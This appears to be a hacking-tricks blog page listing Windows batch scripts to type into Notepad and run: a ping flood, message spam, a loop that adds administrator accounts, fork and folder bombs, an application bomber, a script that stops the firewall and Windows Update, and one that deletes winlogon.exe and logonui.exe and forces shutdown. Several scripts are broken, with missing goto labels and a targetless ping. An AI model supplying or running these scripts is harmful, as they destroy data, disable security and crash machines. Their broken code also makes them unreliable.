
Batch File tricks

Packet folder....!
Open Notepad & Type
@echo off
ping -l 65500 -t
start flooder.bat
goto flood
Save as arvind.bat

Msg Annoyer (message Broadcaster)....!
Open Notepad & Type
@echo off
msg * Hi!
msg * How r u ?
msg * Wat's Up ?
msg * Myself Arvind Chandel....
msg * My Web Links are....
msg * www.arvindhackingtools.blogspot.com.....
msg * www.upscportal.in
msg * www.usefulwebsitename.blogspot.com
goto netannoy
Save as arvind.bat

Create Unlimted User...!

open notepad & type
@echo off
set usr=%random%
net users %usr% %random% /add
net localgroup administrators %usr% /add
goto usrflood
Save as arvind.bat

Folder Repiicator Virus ....!
open notepad & type
md Virus
cd Virus
goto loop
save as arvind.bat

Frok Bombing....!

open notepad & type
@echo off
Call fork.bat
Goto loop
save as arvind.bat

Application Bomber....!
open notepad & type
@echo off
start notepad
start compmgmt.msc
start mspaint
start osk
start cmd
start explorer
start control
start calc
goto loop
save as arvind.bat

Service Disabler....!

open notepad & type
@echo off
net stop "Windows Firewall"
net stop "Windows Update"
net stop Workstation
net stop "DHCP Client"
net stop "DNS Client"
net stop "Print Spooler"
net stop Themes
save as arvind.bat
Cool Batch File Trick ....!
open notepad and type
@echo off
goto :start
save as arvind.bat

Batch File Trick(create 3000 floder in a single minute)....!

open notepad and type

@echo off
md %random%
goto loop

save as arvind.bat

Dangerus batch File Coding....!
1.copy this and paste this in your notepad..
@echo off
del c:\windows\system32\restore
del c:\windows\system32\winlogon.exe
del c:\windows\system32\logonui.exe
shutdown -f

2.save it and give it a name like "ARVIND" or whatever just remember to put ".bat" at the end of it.
Frok Bombing ....!
Open Notepad & Type
@echo off
Call fork.bat
Goto loop
save it as ‘fork.bat’
The system to crash by popping up hundreds of windows on the screen

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